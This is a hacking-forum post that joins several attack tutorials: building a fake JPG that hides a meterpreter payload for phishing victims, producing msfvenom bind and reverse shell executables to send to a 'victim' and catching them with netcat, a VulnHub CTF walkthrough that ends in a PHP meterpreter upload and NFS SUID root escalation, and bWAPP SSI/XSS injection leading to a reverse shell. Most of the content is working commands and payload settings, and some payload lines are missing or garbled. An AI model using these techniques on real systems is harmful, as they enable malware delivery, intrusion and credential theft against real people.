Login

**NINZA** · 05-02-2020, 11:44 AM

0			0

In this article, we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is designed so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with a hidden malicious .bat/.exe file inside it.
Let’s start!
Open the terminal inside your Kali Linux and type following command to download it from GitHub.
git clone

[To see content please register here]

1
git clone

[To see content please register here]

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.
[Image: 2.png?w=687&ssl=1]

Now make some changes inside the setting file as shown the screenshot:
Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any extension among these four: ps1, bat, txt, exe. I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO and scroll down for next configuration.
[Image: 3.png?w=687&ssl=1]

In the same way, set these two values also as shown in the screenshot then save the changes.
AUTO_PAYLOAD_BUILD=YES
AGENT_HANLER_PORT=4444
1
2
AUTO_PAYLOAD_BUILD=YES
AGENT_HANLER_PORT=4444
[Image: 4.png?w=687&ssl=1]

After making certain changes in setting file then open the terminal and run the program file:
cd FakeImageExploiter
./FakeImageExploiter.sh
1
2
cd FakeImageExploiter
./FakeImageExploiter.sh
[Image: 5.png?w=687&ssl=1]

Click on YES to execute framework.
[Image: 6.png?w=687&ssl=1]

Select payload to build as I had chosen window/meterpreter/reverse_tcp for the attack.
[Image: 7.png?w=687&ssl=1]

After then a pop-up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.
[Image: 8.png?w=687&ssl=1]

Now select the icon for your malicious image.
[Image: 9.png?w=687&ssl=1]

Give a name to your payload which will be displayed to the victim as file name, from the screenshot you can see I had given sales.
[Image: 10.png?w=687&ssl=1]

Now it generates a link as you can observe it from highlighted part of the screenshot and then send this link to the victim. Now victim will download the zip file and click on the sales.jpg.
[Image: 11.png?w=687&ssl=1]

When victim will click on sales.jpg, we will get a meterpreter session at the background on Metasploit framework.
[Image: 12.png?w=687&ssl=1]

In this article, you will learn how we can connect with the victim through netcat shell using msfvenom payload. There will be two different ways of hacking any system using msfvenom with netcat.
1st Method
Firstly open the terminal and type following command for msfvenom which generate an exe payload:
msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 –f exe > /root/Desktop/root.exe
1
msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 –f exe > /root/Desktop/root.exe
[Image: 1.png?w=687&ssl=1]

Then send this root.exe file to victim and open another terminal for netcat shell and type following command:
nc 192.168.0.103 8956
1
nc 192.168.0.103 8956
When the victim will click on root.exe file attacker will get access to the victim’s system.
[Image: 2.png?w=687&ssl=1]

2nd Method
Again open the terminal type following command for msfvenom which generate an exe payload:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 –f exe > /root/Desktop/1.exe
1
msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 –f exe > /root/Desktop/1.exe
[Image: 3.png?w=687&ssl=1]

Then send this 1.exe file to victim and open another terminal for netcat shell and type following command:
nc -lvp 8888
1
nc -lvp 8888
When the victim will click on 1.exe file attacker will get the reverse connection of the victim’s system.
[Image: 4.png?w=687&ssl=1]

Hello friends! Today again we are here with a new vulnerable hub challenge “ORCUS” design by Mr. Viper. Through this article, we are sharing our work efforts which we have utilized to complete the challenge so that we can catch the flag and beat the goal of this VM machine. This machine contains 4 flags on this machine 1. Get a shell 2. Get root access 3. There is a post-exploitation flag on the box 4. There is something on this box.
You can download it from

[To see content please register here]

.
Let’s Breach!!
192.168.0.151 is the target IP now as we know that enumeration must be the first step for gathering information of any victim so therefore I had used version scan through nmap.
nmap -p- -sV 192.168.0.151
1
nmap -p- -sV 192.168.0.151
From screenshot you can see there are so many open ports but I will go with port 80.
[Image: 1.png?w=687&ssl=1]

Since port 80 was opened therefore I had explore target IP 192.168.0.151 in the browser but here I didn’t get any remarkable thing.
[Image: 2.png?w=687&ssl=1]

Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories open the terminal and type following:
dirb

[To see content please register here]

1
dirb

[To see content please register here]

Awesome! We have stepped up in the right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “backups” directories. So now I will go with backups directory.
[Image: 3.png?w=687&ssl=1]

In the browser, I explored 192.168.0.151/backups as URL, where I found a tar file “simple PHP Quiz-backup.tar.gz”. Without taking more time I just download it for further enumeration.
[Image: 4.png?w=687&ssl=1]

So after unzipping when I open it, I found php and html files inside it, keeping eyes on php files I choose db-conn.php for fetching more details in the hop to get something related to the database.
[Image: 5.png?w=687&ssl=1]

Finally, after making many efforts I found database username and password as dbuser: dbpasswords respectively.
[Image: 6.png?w=687&ssl=1]

In dirb brute force attack, we have found many directories once again if you will scroll up you will notice phpmyadmin directory in the above-given screenshot. Now again I will move towards the browser to explore 192.168.0.1.51/phpmyadmin in URL. The form is given below screenshot you can observe I had entered above username and password here.
[Image: 7.png?w=687&ssl=1]

When you will give correct login credential it will allow you to login inside phpmyadmin page. From the screenshot you can see I have successfully login inside it using above credential, here I found a database “zenphoto” and decided to move inside it for further details.
[Image: 8.png?w=687&ssl=1]

Now inside zenphoto, I found a setup page which will update the configuration file for the database inside web server when we will fill the information in the given text field.
[Image: 9.png?w=687&ssl=1]

Here only we need to provide database username i.e. dbuser and database password i.e. dbpassword
Without disturbing other fields click on save which will start database zenphoto installation.
[Image: 10.png?w=687&ssl=1]

This will start installation when you will click on the go tab given at the end of the page. The zenphoto setup will start installing theme and plug-in for your database after that you have to set your admin user and password.
[Image: 11.png?w=687&ssl=1]

A further click on the given tab I agree to these terms and condition.
[Image: 12.png?w=687&ssl=1]

Now type a name for a new user as admin and type password: password and confirm password as shown in below image and then click on the apply tab given at the top
[Image: 14.png?w=687&ssl=1]

Then login into the zenphoto database using credential as admin: password. So now we are inside admin console where we have decided to upload an image but here we upload any zip file only.
[Image: 15.png?w=687&ssl=1]

Now use msfvenom to generate malicious PHP script and type following command.
msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
1
msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw
From the screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will paste it inside text document and saved with shell.php after that create a new folder copy shell.php inside it and compress it.
Most important thing is to start multi handler inside Metasploit.
[Image: 16.png?w=687&ssl=1]

Then come back to the Browser to upload your zip file, now browse your file and click on upload. Then explore following URL 192.168.0.151/zenphoto/albums, from the given image you can see our shell.php is successfully uploaded now click on it.
[Image: 17.png?w=687&ssl=1]

When you will click on shell.php you will get meterpreter session inside Metasploit. Now type the following command in order to catch the flag.
meterpreter >cd /var/www
meterpreter >ls
meterpreter >cat flag.txt
1
2
3
meterpreter >cd /var/www
meterpreter >ls
meterpreter >cat flag.txt
Congrats! We have caught the 1st flag.
[Image: 18.png?w=687&ssl=1]

After so many efforts I found a folder kippo then I step towards it for more information.
meterpreter >pwd
meterpreter >cd ..
meterpreter >cat /etc/kippo/data/userdb.txt
1
2
3
meterpreter >pwd
meterpreter >cd ..
meterpreter >cat /etc/kippo/data/userdb.txt
Finally! Caught 2nd flag also.
[Image: 19.png?w=687&ssl=1]

Now for root privilege escalation open a text document and following: reference

[To see content please register here]

Then save it as raj.c on the desktop.
[Image: 20.png?w=687&ssl=1]

Now upload raj.c file for compiling and gain root access as shown in the following image.
meterpreter >upload /root/Desktop/raj.c .
meterpreter >shell
gcc -o raj raj.c
1
2
3
meterpreter >upload /root/Desktop/raj.c .
meterpreter >shell
gcc -o raj raj.c
[Image: 21.png?w=687&ssl=1]

Since we know from the nmap result nfs port was open in targeted IP so taking advantage of it we will mount tmp data in URL Kali Linux. Now create a folder mount data inside it.
mount -t nfs 192.168.0.151:/tmp mount
chown root:root raj
chmod u+s raj
1
2
3
mount -t nfs 192.168.0.151:/tmp mount
chown root:root raj
chmod u+s raj
[Image: 22.png?w=687&ssl=1]

./raj
id
cd /root
cat flag.txt
1
2
3
4
./raj
id
cd /root
cat flag.txt
Great!! We have Caught 3rd flag also.
Now try yourself to find out one more flag.
[Image: 23.png?w=687&ssl=1]

In this article, you will learn how to exploit any server using server-side include injection which is commonly known as SSI.
SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. The attacker can access sensitive information, such as password files, and execute shell commands. The SSI directives are injected in input fields and they are sent to the web server.
For more information visit owasp.org
Let’s begin
In your Kali Linux open the target IP in the browser: 192.168.1.103/bWAPP/login.php. Enter user and password as bee and bug respectively.
Set security level low, from list box chooses your bug select server-side include injection now and click on hack
[Image: 1.png?w=687&ssl=1]

Now request web page will get open where you can see it is having two text fields for first name and last name respectfully.
[Image: 2.png?w=687&ssl=1]

Then I had given random name test: test as the first name and last name respectfully, to know what exactly I will receive when I will click on the lookup tab. Here first name text filed is vulnerable to SSI injection.
[Image: 3.png?w=687&ssl=1]

when I clicked on lookup, a new web page pop up on the window screen which was showing the IP 192.168.1.107 of my Kali Linux.
[Image: 4.png?w=687&ssl=1]

Now I will try to exploit this vulnerability by sending different types of malicious code into a web application. If you will see the following screenshot carefully here I had sent a script which will generate an alert prompt in the window screen. To perform this you need to modify text field of first name and type following code inside it.
<script>alert("hack")</script>
1
<script>alert("hack")</script>
[Image: 5.png?w=687&ssl=1]

So when again we will click on lookup then an alert prompt “hack” will pop up in the window screen. Hence it confirms that first name text filed is vulnerable.
[Image: 6.png?w=687&ssl=1]

If I am willing to fetch cookies of the web server then this can be possible here also. Only we need to type following script code in the same text filed.
<script>alert(document.cookie)</script>
1
<script>alert(document.cookie)</script>
[Image: 11.png?w=687&ssl=1]

Now again an alert prompt will pop up with the server’s cookie, which we can use for further exploitation.
[Image: 12.png?w=687&ssl=1]

Using exec directive we can execute a server-side command with cmd as parameters. Here I am trying to retrieve all lists of files and folder using the following code.

1

[Image: 13.1.png?w=687&ssl=1]

Wonderful!! So you can see without making a proper compromise to the server we have got all present directories inside it.
[Image: 13.2.png?w=687&ssl=1]

Now at last finally we will try to access its remote shell using netcat which will help us for establishing a reverse connection with the targeted system. Open a terminal to start netcat listener on port 4444 and type following inside vulnerable text filed as done above.

1

[Image: 14.png?w=687&ssl=1]

So when again you will click on lookup tab you will get a reverse connection through netcat shell as I have received in following image which means the web application server is hacked where we can execute the following command to penetrate more and more.
id
pwd
1
2
id
pwd
[Image: 15.png?w=687&ssl=1]

Login
Username: Password: Lost Password? Remember me
Or Register an account

Announcement : For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis